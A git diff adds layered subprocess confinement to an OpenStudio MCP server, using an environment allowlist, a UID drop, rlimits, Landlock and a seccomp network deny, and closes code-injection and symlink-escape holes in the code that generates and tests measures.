+    # Reject NaN/inf: a non-finite SIM_TIMEOUT would make both `<= 0` and the
+    # elapsed-time comparison false, silently disabling timeout enforcement.
+    if not math.isfinite(v):
+        return default
+    return v
 
 _raw_concurrency = os.environ.get("OPENSTUDIO_MCP_MAX_CONCURRENCY", os.environ.get("OSMCP_MAX_CONCURRENCY", "1"))
 MAX_CONCURRENCY = _safe_int(_raw_concurrency, 1)
@@ -58,6 +65,109 @@ def _safe_float(env_val: str, default: float) -> float:
 
 ENABLE_CODE_MODE = os.environ.get("OSMCP_CODE_MODE", "").lower() in ("1", "true")
 
+# Subprocess confinement for measure/simulation execution (see mcp_server/sandbox.py).
+#   off    — full passthrough (explicit escape hatch for trusted/local-tooling use)
+#   posix  — clean-env allowlist + UID drop (if root) + rlimits
+#   auto   — best confinement available (default): clean-env + Landlock FS +
+#            seccomp net-deny + rlimits, plus UID drop when running as root.
+# Secure by default. Degrades loudly: the unprivileged layers (Landlock/seccomp)
+# apply even for a non-root local server; on a platform without a kernel backend
+# (macOS/Windows bare installs) it falls back to clean-env only and logs a notice.
+_SANDBOX_OFF_ALIASES = frozenset({"", "off", "0", "false", "no"})
+_SANDBOX_ON_MODES = frozenset({"posix", "auto", "full", "landlock"})
+
+
+def _normalize_sandbox_mode(raw: str) -> str:
+    """Map OSMCP_SANDBOX to a known mode, FAIL-CLOSED on an unrecognized value.
+
+    A typo like ``atuo`` would otherwise leave ``enabled()`` True but ``_full()``
+    False — silently downgrading from the default Landlock+seccomp tier to
+    posix-only. To never weaken confinement on a typo, force the most-restrictive
+    ``auto`` and warn loudly. Off-aliases are honored as-is (disabling is explicit).
+    """
+    v = (raw or "").strip().lower()
+    if v in _SANDBOX_OFF_ALIASES or v in _SANDBOX_ON_MODES:
+        return v
+    print(f"[sandbox] unknown OSMCP_SANDBOX={raw!r}; falling back to 'auto' "
+          "(fail-closed). Valid values: off, posix, auto, full, landlock.",
+          file=sys.stderr)
+    return "auto"
+
+
+SANDBOX_MODE = _normalize_sandbox_mode(os.environ.get("OSMCP_SANDBOX", "auto"))
+# Network policy for confined subprocesses: deny (default) blocks outbound TCP
+# once the seccomp backend lands; allow leaves it open (trusted/BCL deployments).
+SANDBOX_NET = os.environ.get("OSMCP_SANDBOX_NET", "deny").strip().lower()
+
+# Wall-clock cap for a single simulation (run_osw/run_simulation). 0 = no cap.
+SIM_TIMEOUT_SECONDS = _safe_float(
+    os.environ.get("OPENSTUDIO_MCP_SIM_TIMEOUT_SECONDS",
+                   os.environ.get("OSMCP_SIM_TIMEOUT_SECONDS", "7200")),
+    7200.0,
+)
+
+# Unprivileged account confined subprocesses drop to (baked into the image as
+# `sandbox`). See mcp_server/_sandbox_exec.py.
+def _safe_sandbox_id(env_val: str, default: int) -> int:
+    """A positive uid/gid. Rejects <=0 (esp. 0=root) so a bad override can never
+    leave confined code running as root after the setuid 'drop'."""
+    v = _safe_int(env_val, default)
+    return v if v > 0 else default
+
+
+SANDBOX_UID = _safe_sandbox_id(os.environ.get("OSMCP_SANDBOX_UID", "1001"), 1001)
+SANDBOX_GID = _safe_sandbox_id(os.environ.get("OSMCP_SANDBOX_GID", "1001"), 1001)
+
+# Per-tenant uid derivation (multi-user hardening). Every distinct remote caller
+# (HTTP session / auth principal) gets its OWN sandbox uid so that:
+#   - RLIMIT_NPROC — which the kernel counts PER REAL UID — is a private budget,
+#     so one tenant's fork bomb can't starve every other tenant's runs; and
+#   - DAC isolates tenants' run dirs from each other even in the posix tier
+#     (no Landlock), since the dirs are chowned to, and processes run as,
+#     different uids.
+# The local single user (stdio / off-request) keeps the baked-in SANDBOX_UID,
+# preserving today's behavior. Derived uids sit above the system/sandbox range
+# and below `nobody`, and are never root.
+_PER_TENANT_UID_BASE = 2000
+_PER_TENANT_UID_SPAN = 60000  # uids 2000..61999
+
+
+def _derive_tenant_uid(key: str) -> int:
+    """Stable, process-independent uid for a tenant key.
+
+    Uses hashlib (NOT the salted builtin hash()) so chown (server) and setuid
+    (shim, a separate process) derive the SAME uid for a request across restarts.
+    """
+    import hashlib
+    digest = hashlib.sha256(key.encode("utf-8")).digest()
+    return _PER_TENANT_UID_BASE + (int.from_bytes(digest[:4], "big") % _PER_TENANT_UID_SPAN)
+
+
+def sandbox_ids() -> tuple[int, int]:
+    """(uid, gid) the CURRENT caller's confined subprocess drops to.
+
+    Resolved per-call from caller identity (same key in → same uid out, so a
+    request's prepare_workdir chown and the shim's setuid agree). LOCAL → the
+    baked SANDBOX_UID/GID; each remote tenant → its own derived uid (gid==uid).
+    """
+    from mcp_server.identity import LOCAL, user_key
+    key = user_key()
+    if key == LOCAL:
+        return (SANDBOX_UID, SANDBOX_GID)
+    uid = _derive_tenant_uid(key)
+    return (uid, uid)
+
+# rlimit backstops for confined subprocesses (0 = off). Generous by design — they
+# catch runaway bombs, not tune normal use. CPU/AS default off: a CPU-second cap
+# would kill long annual sims, and RLIMIT_AS (virtual address space) breaks
+# EnergyPlus/allocators — real memory control belongs to the container cgroup.
+_GB = 1024 ** 3
+SANDBOX_RLIMIT_FSIZE = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_FSIZE", str(10 * _GB)), 10 * _GB)
+SANDBOX_RLIMIT_NPROC = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_NPROC", "1024"), 1024)
+SANDBOX_RLIMIT_NOFILE = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_NOFILE", "0"), 0)
+SANDBOX_RLIMIT_CPU = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_CPU", "0"), 0)
+SANDBOX_RLIMIT_AS = _safe_int(os.environ.get("OSMCP_SANDBOX_RLIMIT_AS", "0"), 0)
+
 # Shared roots are read-only for everyone; the only per-user writable area is
 # RUN_ROOT/<user_key> (see user_run_root). Writes elsewhere are denied.
 _SHARED_READ_ROOTS = [
diff --git a/mcp_server/sandbox.py b/mcp_server/sandbox.py
new file mode 100644
index 0000000..80bc85b
--- /dev/null
+++ b/mcp_server/sandbox.py
@@ -0,0 +1,253 @@
+"""Confinement for the measure / simulation subprocesses (Codex-style, tiered).
+
+Everything an applied measure or a simulation runs goes through three subprocess
+sites — `apply_measure`, `test_measure`, and the sim dispatcher's `_launch`.
+They used to inherit the server's full environment via ``os.environ.copy()``.
+This module is the single chokepoint that confines them.
+
+`OSMCP_SANDBOX` (config.SANDBOX_MODE) selects the mode (default `auto`):
+  off    — full passthrough (explicit escape hatch for trusted/local-tooling use)
+  posix  — clean-env allowlist + UID drop (when root) + rlimits
+  auto   — best available: posix + Landlock FS policy + seccomp net-deny (Linux)
+
+`off` is a true passthrough so an operator can deliberately disable confinement
+(the Codex ``danger-full-access`` model); the security PoC suite pins it to prove
+the holes still exist when off.
+
+The unprivileged layers (clean-env, Landlock, seccomp, rlimits) apply even when
+the server runs non-root; only the UID drop is root-gated and skipped otherwise.
+`OSMCP_SANDBOX_NET=allow` opts out of the network deny. On a platform with no
+kernel backend (macOS/Windows bare installs) `wrap_cmd` degrades to clean-env
+only and warns once. `active_tier()` reports what is actually in effect so
+degradation is visible (never silent).
+"""
+from __future__ import annotations
+
+import contextlib
+import os
+import sys
+from pathlib import Path
+
+from mcp_server.config import (
+    COMMON_MEASURES_DIR,
+    COMSTOCK_MEASURES_DIR,
+    SANDBOX_MODE,
+    SANDBOX_NET,
+    SANDBOX_RLIMIT_AS,
+    SANDBOX_RLIMIT_CPU,
+    SANDBOX_RLIMIT_FSIZE,
+    SANDBOX_RLIMIT_NOFILE,
+    SANDBOX_RLIMIT_NPROC,
+    SKILLS_DIR,
+    sandbox_ids,
+)
+
+# Read-only roots the confined subprocess legitimately needs (Landlock grants
+# read+exec here, nothing else; the run dir is the only writable path). Read-deny
+# by default: anything not listed — another user's run, /tmp, arbitrary host
+# files — is unreadable. Missing paths are skipped by the Landlock layer.
+_FULL_MODES = ("auto", "full", "landlock")
+# /proc is deliberately NOT granted (H1): with /proc readable a confined measure
+# could read /proc/<pid>/environ and, on a non-root server (measure uid == server
+# uid), recover the server's secrets that clean-env stripped — including HTTP auth
+# tokens — and inspect peer tenants' processes. OpenStudio/EnergyPlus run without
+# it. /sys/<...> hardware info stays (no secrets; some libs read CPU topology).
+_RO_SYSTEM = ("/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc",
+              "/opt/venv", "/usr/local", "/var/oscli", "/sys")
+
+# Specific device files the confined process needs — granted individually instead
+# of the whole /dev directory. A `/dev` rw grant also exposes writable /dev/shm and
+# /dev/mqueue (shared storage / IPC outside the run dir) and permits mknod. These
+# are file-level Landlock rules, so only the file-access bits apply — no directory
+# powers. Read-write: the bit-bucket + zero source; read-only: the entropy sources.
+_DEV_RW = ("/dev/null", "/dev/zero")
+_DEV_RO = ("/dev/urandom", "/dev/random")
+
+_warned_no_backend = False  # one-shot log when no kernel backend (non-Linux)
+
+# Environment the OpenStudio CLI / bundler / EnergyPlus / measure code legitimately
+# needs. Everything else — notably any host secret — is dropped in confined modes.
+_ENV_ALLOW_EXACT = frozenset({
+    "PATH", "HOME", "USER", "LANG", "LC_ALL", "TZ", "TERM", "RUBYOPT",
+    "RUBYLIB", "RUBY_VERSION", "ENERGYPLUS_EXE_PATH",
+    "OS_BUNDLER_VERSION", "RC_RELEASE",
+    "VENV_PATH", "PYTHONUNBUFFERED",
+    "COMSTOCK_MEASURES_DIR", "COMMON_MEASURES_DIR", "SKILLS_DIR",
+    "OSCLI_GEMFILE", "OSCLI_GEM_PATH",
+    "OSMCP_RUN_ROOT", "OPENSTUDIO_MCP_RUN_ROOT",
+    # Bundler / RubyGems config — EXPLICIT safe names only. A broad BUNDLE_/GEM_
+    # prefix would leak credential vars (e.g. GEM_HOST_API_KEY, or per-host
+    # BUNDLE_<HOST>__<COM> auth tokens) into untrusted measure code.
+    "BUNDLE_WITHOUT", "BUNDLE_PATH", "BUNDLE_GEMFILE", "BUNDLE_FROZEN",
+    "BUNDLE_DEPLOYMENT", "GEM_HOME", "GEM_PATH",
+    # Standard POSIX locale categories ONLY — enumerated, never prefix-matched: a
+    # bare LC_ prefix would also copy a host secret named e.g. LC_API_TOKEN.
+    "LC_CTYPE", "LC_NUMERIC", "LC_TIME", "LC_COLLATE", "LC_MONETARY",
+    "LC_MESSAGES", "LC_PAPER", "LC_NAME", "LC_ADDRESS", "LC_TELEPHONE",
+    "LC_MEASUREMENT", "LC_IDENTIFICATION",
+})
+_ENV_ALLOW_PREFIXES: tuple[str, ...] = ()  # no prefix matching — exact names only
+
+
+def enabled() -> bool:
+    """True when any confinement is active (i.e. OSMCP_SANDBOX is not 'off')."""
+    return SANDBOX_MODE not in ("", "off", "0", "false", "no")
+
+
+def _full() -> bool:
+    """True when the full tier (Landlock FS + seccomp net-deny) is requested."""
+    return SANDBOX_MODE in _FULL_MODES
+
+
+def _has_backend() -> bool:
+    """True where the kernel confinement shim can run (Landlock/seccomp = Linux)."""
+    return sys.platform.startswith("linux")
+
+
+def active_tier() -> str:
+    """The confinement tier actually in effect — surfaced in tool output."""
+    if not enabled():
+        return "off"
+    if not _has_backend():
+        return "clean-env"  # env stripping only; no kernel backend on this platform
+    return "landlock" if _full() else "posix"
+
+
+def _ro_paths() -> list[str]:
+    """Read-only roots the confined subprocess may read/execute.
+
+    /repo is deliberately NOT granted: the measure runs from the copied run dir,
+    and the shim imports mcp_server before applying Landlock — so the run never
+    needs to read the source tree (which could hold a host .env).
+
+    INPUT_ROOT (/inputs) is deliberately NOT granted either: it is a SHARED,
+    multi-tenant dir, so granting it would let one tenant's confined measure read
+    another's inputs. Inputs are staged into the run dir before execution, so the
+    confined process reads the staged copy, never /inputs directly.
+
+    The broad system roots (/etc, /proc, /sys) are intentional and DAC-mitigated:
+    OpenStudio/Ruby/EnergyPlus need bits of each (certs, nsswitch, /proc/self,
+    cpuinfo), and the uid-1001 drop means the kernel already blocks reads of
+    non-world-readable secrets (/etc/shadow) and other users' /proc/<pid>/environ.
+    Landlock here is defense-in-depth on top of DAC, not the only barrier.
+    """
+    return [
+        *_RO_SYSTEM,
+        str(COMSTOCK_MEASURES_DIR), str(COMMON_MEASURES_DIR),
+        str(SKILLS_DIR),
+    ]
+
+
+def build_env(work_dir: Path | str, *, redirect_tmp: bool = True) -> dict[str, str]:
+    """Environment for a confined subprocess.
+
+    Disabled → full passthrough (``os.environ.copy()``), preserving today's
+    behaviour. Enabled → only allowlisted variables survive, so no host secret
+    reaches measure code.
+
+    redirect_tmp (default) pins HOME/TMPDIR into work_dir/tmp, keeping temp +
+    caches inside the run dir so the Landlock backend (which makes only that dir
+    writable) permits them. Pass redirect_tmp=False for the non-Landlocked
+    test_measure path: pytest's capture uses an unlinked tempfile, which the
+    Docker-Desktop bind mount can't keep open — so it must stay on /tmp.
+    """
+    if not enabled():
+        return os.environ.copy()
+    env = {
+        k: v for k, v in os.environ.items()
+        if k in _ENV_ALLOW_EXACT or k.startswith(_ENV_ALLOW_PREFIXES)
+    }
+    if redirect_tmp:
+        work = Path(work_dir)
+        env["HOME"] = str(work)
+        tmp = work / "tmp"
+        try:
+            tmp.mkdir(parents=True, exist_ok=True)
+            env["TMPDIR"] = str(tmp)
+        except OSError:
+            pass
+    return env
+
+
+def wrap_cmd(cmd: list[str], work_dir: Path | str,
+             extra_rw: tuple[str, ...] = ()) -> list[str]:
+    """Wrap a subprocess argv to run under the privilege-dropping exec shim.
+
+    Disabled → returns the command unchanged (today's behaviour). Enabled → runs
+    it via `python3 -m mcp_server._sandbox_exec`, which drops to the unprivileged
+    sandbox uid (when root), applies rlimits, sets no_new_privs, then execs the
+    command (the pid is preserved so the dispatcher's kill-by-pid path still
+    works). Full tier additionally confines the filesystem (Landlock: read-only
+    system roots, writable only `work_dir` + `extra_rw`) and — unless
+    OSMCP_SANDBOX_NET=allow — denies outbound IP networking (seccomp).
+
+    extra_rw: additional writable Landlock roots (e.g. a private TMPDIR off the
+    bind mount for tools that need unlinked tempfiles).
+    """
+    if not enabled():
+        return list(cmd)
+    if not _has_backend():
+        # macOS/Windows bare installs: no kernel sandbox shim. Run unwrapped
+        # (clean-env from build_env still strips secrets); warn once.
+        global _warned_no_backend
+        if not _warned_no_backend:
+            print(f"[sandbox] no kernel confinement backend on {sys.platform}; "
+                  "running unwrapped (clean-env only) — use the Docker image for "
+                  "full FS/network confinement", file=sys.stderr)
+            _warned_no_backend = True
+        return list(cmd)
+    # Per-tenant uid/gid: each remote caller drops to its own uid (private NPROC
+    # budget + DAC isolation); the local single user keeps the base uid. Resolved
+    # here so it matches the chown prepare_workdir does for the same request.
+    uid, gid = sandbox_ids()
+    wrapped = [
+        sys.executable, "-m", "mcp_server._sandbox_exec",
+        "--uid", str(uid), "--gid", str(gid),
+    ]
+    for flag, value in (
+        ("--rlimit-fsize", SANDBOX_RLIMIT_FSIZE),
+        ("--rlimit-nproc", SANDBOX_RLIMIT_NPROC),
+        ("--rlimit-nofile", SANDBOX_RLIMIT_NOFILE),
+        ("--rlimit-cpu", SANDBOX_RLIMIT_CPU),
+        ("--rlimit-as", SANDBOX_RLIMIT_AS),
+    ):
+        if value and value > 0:
+            wrapped += [flag, str(value)]
+    if _full():
+        for path in (*_ro_paths(), *_DEV_RO):
+            wrapped += ["--landlock-ro", path]
+        # rw: the run dir (+ caller extras) + the writable device FILES only — NOT
+        # the whole /dev dir (which would also expose writable /dev/shm, /dev/mqueue
+        # and permit mknod). See _DEV_RW / _DEV_RO above.
+        for path in (str(work_dir), *_DEV_RW, *extra_rw):
+            wrapped += ["--landlock-rw", path]
+        # Network deny is the default; OSMCP_SANDBOX_NET=allow opts out (trusted
+        # deployments that legitimately fetch e.g. BCL components).
+        if SANDBOX_NET != "allow":
+            wrapped += ["--seccomp-net"]
+    return [*wrapped, "--", *cmd]
+
+
+def prepare_workdir(work_dir: Path | str) -> None:
+    """Hand the work dir to the sandbox account so the dropped process can write.
+
+    No-op when confinement is off. The server is root, so it chowns the run dir
+    (recursively) to the sandbox uid before exec; the root server still reads the
+    outputs afterwards. Bind mounts that ignore ownership (e.g. Docker Desktop)
+    make this a harmless no-op there — confinement still holds for in-image paths.
+    """
+    # Only the root server needs to hand the dir to the sandbox uid; when not root
+    # the shim keeps the current uid, which already owns the dir it created.
+    if not enabled() or not (hasattr(os, "geteuid") and os.geteuid() == 0):
+        return
+    work = Path(work_dir)
+    # Per-tenant uid/gid (matches the shim's setuid for this same request) so the
+    # dropped process owns its run dir and tenants are DAC-isolated from each other.
+    uid, gid = sandbox_ids()
+    # follow_symlinks=False (lchown): never let a symlink inside the dir redirect
+    # the chown to a target outside it (symlink-traversal privilege issue).
+    with contextlib.suppress(OSError):
+        os.chown(work, uid, gid, follow_symlinks=False)
+    for path in work.rglob("*"):
+        with contextlib.suppress(OSError):
+            os.chown(path, uid, gid, follow_symlinks=False)
diff --git a/mcp_server/skills/measure_authoring/operations.py b/mcp_server/skills/measure_authoring/operations.py
index 5ef1ed9..5536df9 100644
--- a/mcp_server/skills/measure_authoring/operations.py
+++ b/mcp_server/skills/measure_authoring/operations.py
@@ -5,15 +5,19 @@
 """
 from __future__ import annotations
 
+import contextlib
 import re
 import shutil
 import subprocess
+import tempfile
 from pathlib import Path
 from typing import Any
 
 import openstudio
 
-from mcp_server.config import INPUT_ROOT, user_run_root
+from mcp_server import sandbox
+from mcp_server.config import INPUT_ROOT, is_path_allowed, user_run_root
+from mcp_server.util import read_file_bounded, reject_escaping_symlinks
 
 
 def custom_measures_dir() -> Path:
@@ -28,6 +32,12 @@ def custom_measures_dir() -> Path:
 ]
 
 _MEASURE_NAME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9_]{0,99}$")
+# Argument names become bare Ruby/Python identifiers in generated code — they must
+# be plain identifiers, never arbitrary text (else code injection at generation).
+# Must start lowercase/underscore: an uppercase-leading name (e.g. "Foo") is a Ruby
+# *constant*, so `Foo = ...` inside a method is a "dynamic constant assignment"
+# SyntaxError that breaks the generated Ruby measure.
+_ARG_NAME_RE = re.compile(r"^[a-z_][a-zA-Z0-9_]{0,63}$")
 
 # Argument type -> SDK factory method name suffix
 _ARG_MAKERS = {
@@ -81,8 +91,15 @@ def _to_class_name(snake: str) -> str:
 
 
 def _escape_ruby_str(s: str) -> str:
-    """Escape a string for safe embedding in a Ruby double-quoted string."""
-    return s.replace("\\", "\\\\").replace('"', '\\"')
+    """Escape a string for safe embedding in a Ruby double-quoted string.
+
+    Besides backslash and the closing quote, `#` MUST be escaped: in a Ruby
+    double-quoted literal `#{...}` (and `#@`, `#$`) is interpolation, so an
+    un-escaped `#` in user-controlled text (description / default / choice value)
+    is arbitrary Ruby execution when the generated measure runs `openstudio
+    measure -u`. `\\#` yields a literal `#`.
+    """
+    return s.replace("\\", "\\\\").replace('"', '\\"').replace("#", "\\#")
 
 
 def _escape_python_str(s: str) -> str:
@@ -90,6 +107,17 @@ def _escape_python_str(s: str) -> str:
     return s.replace("\\", "\\\\").replace('"', '\\"')
 
 
+def _checked_arg_name(name: str) -> str:
+    """Validate an argument name as a plain identifier — it is emitted as a bare
+    Ruby/Python variable in generated code, so arbitrary text would be code
+    injection. Raises ValueError otherwise (callers wrap in ok:false)."""
+    if not isinstance(name, str) or not _ARG_NAME_RE.match(name):
+        raise ValueError(
+            "invalid argument name (must be a lowercase-leading identifier, "
+            f"matching [a-z_][a-zA-Z0-9_]*): {name!r}")
+    return name
+
+
 def _generate_ruby_arguments(args: list[dict]) -> str:
     """Generate Ruby arguments() method body."""
     lines = [
@@ -97,28 +125,26 @@ def _generate_ruby_arguments(args: list[dict]) -> str:
         "    args = OpenStudio::Measure::OSArgumentVector.new",
     ]
     for a in args:
-        name = a["name"]
+        name = _checked_arg_name(a["name"])  # bare Ruby identifier — validated, never raw text
         atype = a.get("type", "String")
         required = a.get("required", True)
         req_str = "true" if required else "false"
         maker = _ARG_MAKERS.get(atype, "String")
         if atype == "Choice" and "values" in a:
-            # Choice args require values at construction time
-            vals = a["values"]
-            choices_arr = ", ".join(f'"{v}"' for v in vals)
+            # Choice args require values at construction time (escape each value)
             lines.append(f"    {name}_choices = OpenStudio::StringVector.new")
-            for v in vals:
-                lines.append(f'    {name}_choices << "{v}"')
+            for v in a["values"]:
+                lines.append(f'    {name}_choices << "{_escape_ruby_str(str(v))}"')
             lines.append(f'    {name} = OpenStudio::Measure::OSArgument.makeChoiceArgument("{name}", {name}_choices, {name}_choices, {req_str})')
         else:
             lines.append(f'    {name} = OpenStudio::Measure::OSArgument.make{maker}Argument("{name}", {req_str})')
         if "display_name" in a:
-            lines.append(f'    {name}.setDisplayName("{a["display_name"]}")')
+            lines.append(f'    {name}.setDisplayName("{_escape_ruby_str(str(a["display_name"]))}")')
         else:
             display = name.replace("_", " ").title()
             lines.append(f'    {name}.setDisplayName("{display}")')
         if "description" in a:
-            lines.append(f'    {name}.setDescription("{a["description"]}")')
+            lines.append(f'    {name}.setDescription("{_escape_ruby_str(str(a["description"]))}")')
         if "default_value" in a:
             dv = a["default_value"]
             if atype == "Double":
@@ -128,7 +154,7 @@ def _generate_ruby_arguments(args: list[dict]) -> str:
             elif atype == "Boolean":
                 lines.append(f"    {name}.setDefaultValue({str(dv).lower()})")
             else:
-                lines.append(f'    {name}.setDefaultValue("{dv}")')
+                lines.append(f'    {name}.setDefaultValue("{_escape_ruby_str(str(dv))}")')
         lines.append(f"    args << {name}")
     lines += ["    return args", "  end"]
     return "\n".join(lines)
@@ -141,27 +167,26 @@ def _generate_python_arguments(args: list[dict]) -> str:
         "        args = openstudio.measure.OSArgumentVector()",
     ]
     for a in args:
-        name = a["name"]
+        name = _checked_arg_name(a["name"])  # bare Python identifier — validated, never raw text
         atype = a.get("type", "String")
         required = a.get("required", True)
         req_str = "True" if required else "False"
         maker = _ARG_MAKERS.get(atype, "String")
         if atype == "Choice" and "values" in a:
-            # Choice args require values at construction time
-            vals = a["values"]
+            # Choice args require values at construction time (escape each value)
             lines.append(f"        {name}_choices = openstudio.StringVector()")
-            for v in vals:
-                lines.append(f'        {name}_choices.append("{v}")')
+            for v in a["values"]:
+                lines.append(f'        {name}_choices.append("{_escape_python_str(str(v))}")')
             lines.append(f'        {name} = openstudio.measure.OSArgument.makeChoiceArgument("{name}", {name}_choices, {name}_choices, {req_str})')
         else:
             lines.append(f'        {name} = openstudio.measure.OSArgument.make{maker}Argument("{name}", {req_str})')
         if "display_name" in a:
-            lines.append(f'        {name}.setDisplayName("{a["display_name"]}")')
+            lines.append(f'        {name}.setDisplayName("{_escape_python_str(str(a["display_name"]))}")')
         else:
             display = name.replace("_", " ").title()
             lines.append(f'        {name}.setDisplayName("{display}")')
         if "description" in a:
-            lines.append(f'        {name}.setDescription("{a["description"]}")')
+            lines.append(f'        {name}.setDescription("{_escape_python_str(str(a["description"]))}")')
         if "default_value" in a:
             dv = a["default_value"]
             if atype == "Double":
@@ -171,7 +196,7 @@ def _generate_python_arguments(args: list[dict]) -> str:
             elif atype == "Boolean":
                 lines.append(f"        {name}.setDefaultValue({dv!s})")
             else:
-                lines.append(f'        {name}.setDefaultValue("{dv}")')
+                lines.append(f'        {name}.setDefaultValue("{_escape_python_str(str(dv))}")')
         lines.append(f"        args.append({name})")
     lines += ["        return args"]
     return "\n".join(lines)
@@ -181,7 +206,7 @@ def _generate_ruby_extraction(args: list[dict]) -> str:
     """Generate Ruby argument extraction lines for run() method."""
     lines = []
     for a in args:
-        name = a["name"]
+        name = _checked_arg_name(a["name"])
         atype = a.get("type", "String")
         # Choice args are extracted as strings at runtime
         getter = "String" if atype == "Choice" else _ARG_MAKERS.get(atype, "String")
@@ -193,7 +218,7 @@ def _generate_python_extraction(args: list[dict]) -> str:
     """Generate Python argument extraction lines for run() method."""
     lines = []
     for a in args:
-        name = a["name"]
+        name = _checked_arg_name(a["name"])
         atype = a.get("type", "String")
         # Choice args are extracted as strings at runtime
         getter = "String" if atype == "Choice" else _ARG_MAKERS.get(atype, "String")
@@ -476,13 +501,74 @@ def _update_measure_xml(measure_dir: Path, language: str):
     """
     if language != "Ruby":
         return
-    try:
-        subprocess.run(
-            ["openstudio", "measure", "-u", str(measure_dir)],
-            capture_output=True, text=True, timeout=30, check=False,
-        )
-    except (FileNotFoundError, subprocess.TimeoutExpired):
-        pass
+    # The directory may have been writable by untrusted test code. Never load a
+    # post-test measure script with the long-lived server's privileges.
+    symlink_error = reject_escaping_symlinks(measure_dir)
+    if symlink_error:
+        raise RuntimeError(symlink_error)
+
+    with tempfile.TemporaryDirectory(prefix="osmcp_measure_xml_") as tmp:
+        staged_measure = Path(tmp) / measure_dir.name
+        shutil.copytree(measure_dir, staged_measure, symlinks=True)
+        run_env = sandbox.build_env(staged_measure)
+        sandbox.prepare_workdir(Path(tmp))
+        try:
+            proc = subprocess.run(  # noqa: S603 - argv is fixed and sandbox-wrapped
+                sandbox.wrap_cmd(
+                    ["openstudio", "measure", "-u", str(staged_measure)],
+                    staged_measure,
+                ),
+                cwd=str(staged_measure),
+                env=run_env,
+                capture_output=True,
+                text=True,
+                timeout=30,
+                check=False,
+            )
+        except (FileNotFoundError, subprocess.TimeoutExpired):
+            return
+
+        detail = "\n".join(part.strip() for part in (proc.stdout, proc.stderr) if part.strip())
+        staged_xml = staged_measure / "measure.xml"
+        if proc.returncode != 0 or not staged_xml.is_file() or staged_xml.is_symlink():
+            raise RuntimeError(
+                f"Failed to update measure.xml (exit {proc.returncode}): {detail[-1000:]}",
+            )
+
+        def _copy_generated(name: str, max_bytes: int) -> None:
+            source = staged_measure / name
+            if not source.exists():
+                return
+            # Bounded, no-follow read: `measure -u` ran UNTRUSTED code (confined)
+            # that could have swapped the output for a symlink (-> a host secret)
+            # or a giant file. read_file_bounded uses O_NOFOLLOW and caps the read
+            # at max_bytes+1, so neither a TOCTOU symlink swap nor an oversized
+            # file reaches the unconfined server.
+            try:
+                data = read_file_bounded(source, max_bytes)
+            except ValueError as e:
+                raise RuntimeError(
+                    f"Failed to update measure metadata: invalid generated {name}: {e}",
+                ) from e
+            temp_path: Path | None = None
+            with tempfile.NamedTemporaryFile(
+                dir=measure_dir,
+                prefix=f".{name}_",
+                delete=False,
+            ) as fh:
+                fh.write(data)
+                temp_path = Path(fh.name)
+            try:
+                # chmod is best-effort: replace() is the critical step, and some
+                # filesystems/mounts (or non-POSIX hosts) reject chmod.
+                with contextlib.suppress(OSError):
+                    temp_path.chmod(0o644)
+                temp_path.replace(measure_dir / name)
+            finally:
+                temp_path.unlink(missing_ok=True)
+
+        _copy_generated("measure.xml", 5_000_000)
+        _copy_generated("README.md", 5_000_000)
 
 
 def _add_intended_software_tools(measure_dir: Path):
@@ -925,11 +1011,13 @@ def _test_reporting_measure_with_run(
         "run", "--postprocess_only", "-w", str(osw_path),
     ]
     log_path = run_dir / "openstudio.log"
+    run_env = sandbox.build_env(run_dir)
+    sandbox.prepare_workdir(run_dir)
     with log_path.open("w", encoding="utf-8") as log_f:
         proc = subprocess.run(
-            cmd, cwd=str(run_dir),
+            sandbox.wrap_cmd(cmd, run_dir), cwd=str(run_dir),
             stdout=log_f, stderr=subprocess.STDOUT,
-            env=os.environ.copy(), timeout=120, check=False,
+            env=run_env, timeout=120, check=False,
         )
 
     log_text = log_path.read_text(encoding="utf-8", errors="replace")
@@ -977,10 +1065,29 @@ def test_measure_op(
     3. SystemD_baseline.osm from tests/assets or /inputs
     4. No test_model.osm → test template falls back to empty Model.new()
     """
+    _private_copy: Path | None = None
     try:
         mdir = Path(measure_dir)
         if not mdir.is_dir():
             return {"ok": False, "error": f"Measure directory not found: {measure_dir}"}
+        # Access control: only test measures from allowed roots, and never stage a
+        # tree with an escaping symlink (test_measure chowns + Landlock-grants this
+        # dir, so an arbitrary path here is a privilege/secret-disclosure vector).
+        if not is_path_allowed(mdir):
+            return {"ok": False, "error": f"Measure directory not allowed: {measure_dir}"}
+        err = reject_escaping_symlinks(mdir)
+        if err:
+            return {"ok": False, "error": err}
+
+        # If the measure isn't in the caller's OWN writable area (e.g. a bundled or
+        # otherwise shared read-only measure), copy it into a private run dir and test
+        # the copy. test_measure writes test_model.osm + chowns + Landlock-grants the
+        # dir, so it must never mutate shared/host content. Own-run-root measures are
+        # tested in place (the caller's to mutate; the measure.xml update persists).
+        if not is_path_allowed(mdir, write=True):
+            _private_copy = Path(tempfile.mkdtemp(prefix="measure_test_", dir=user_run_root()))
+            shutil.copytree(mdir, _private_copy, symlinks=True, dirs_exist_ok=True)
+            mdir = _private_copy
 
         # Detect language
         if (mdir / "measure.py").is_file():
@@ -1005,6 +1112,8 @@ def test_measure_op(
         src_model = None
         if model_path:
             src = Path(model_path)
+            if not is_path_allowed(src):
+                return {"ok": False, "error": f"model_path not allowed: {model_path}"}
             if src.is_file():
                 src_model = src
         if not src_model:
@@ -1013,21 +1122,33 @@ def test_measure_op(
             shutil.copy2(str(src_model), str(test_model_dst))
 
         if language == "Python":
-            proc = subprocess.run(
-                ["python3", "-m", "pytest", "tests/", "-v", "--tb=short"],
-                cwd=str(mdir),
-                capture_output=True, text=True, timeout=60, check=False,
-            )
+            test_cmd = ["python3", "-m", "pytest", "tests/", "-v", "--tb=short"]
         else:
             # Run minitest directly (openstudio measure -r doesn't run minitest)
             test_files = list(test_dir.glob("*_test.rb"))
             if not test_files:
                 return {"ok": False, "error": "No Ruby test files found"}
+            test_cmd = ["ruby", "-I", ".", str(test_files[0])]
+
+        # Run the (untrusted) test code under the SAME confinement as apply_measure
+        # — UID drop, rlimits, Landlock, seccomp net-deny. TMPDIR is a private dir
+        # under the in-container /tmp (NOT mdir, which is on the Docker bind mount):
+        # pytest's capture uses an unlinked tempfile the bind mount can't keep open.
+        # It's granted to Landlock as an extra writable root and HOME stays in mdir.
